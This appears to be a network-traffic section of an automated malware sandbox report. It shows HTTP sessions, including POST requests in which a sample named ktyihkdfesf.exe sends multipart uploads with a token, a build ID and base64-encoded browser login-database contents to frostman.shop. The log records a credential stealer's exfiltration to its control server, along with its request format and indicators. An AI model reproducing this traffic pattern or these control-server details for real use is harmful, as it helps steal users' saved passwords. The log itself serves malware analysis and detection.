                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC1390INData Raw: 3b ad 00 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e
                                                                                                                                                                                                                                                                                                Data Ascii: ;^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC1390INData Raw: 28 a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d
                                                                                                                                                                                                                                                                                                Data Ascii: ( 1v=K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC1390INData Raw: 01 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a
                                                                                                                                                                                                                                                                                                Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC1390INData Raw: 3f 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e
                                                                                                                                                                                                                                                                                                Data Ascii: ??AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC1390INData Raw: 4f 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89
                                                                                                                                                                                                                                                                                                Data Ascii: ODsQNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                40192.168.2.649886162.159.61.34432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                41192.168.2.649887172.64.41.34432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                42192.168.2.649888162.159.61.34432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                43192.168.2.649889116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----4WT2VKNOZMO8QIWT2VSR
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 68733
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 57 54 32 56 4b 4e 4f 5a 4d 4f 38 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 34 57 54 32 56 4b 4e 4f 5a 4d 4f 38 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 34 57 54 32 56 4b 4e 4f 5a 4d 4f 38 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------4WT2VKNOZMO8QIWT2VSRContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------4WT2VKNOZMO8QIWT2VSRContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------4WT2VKNOZMO8QIWT2VSRCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                                Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                                Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:42 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                44192.168.2.649913116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----R1DBSJMYMYM7QI5FCJM7
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 262605
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------R1DBSJMYMYM7QI5FCJM7Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------R1DBSJMYMYM7QI5FCJM7Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------R1DBSJMYMYM7QI5FCJM7Cont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
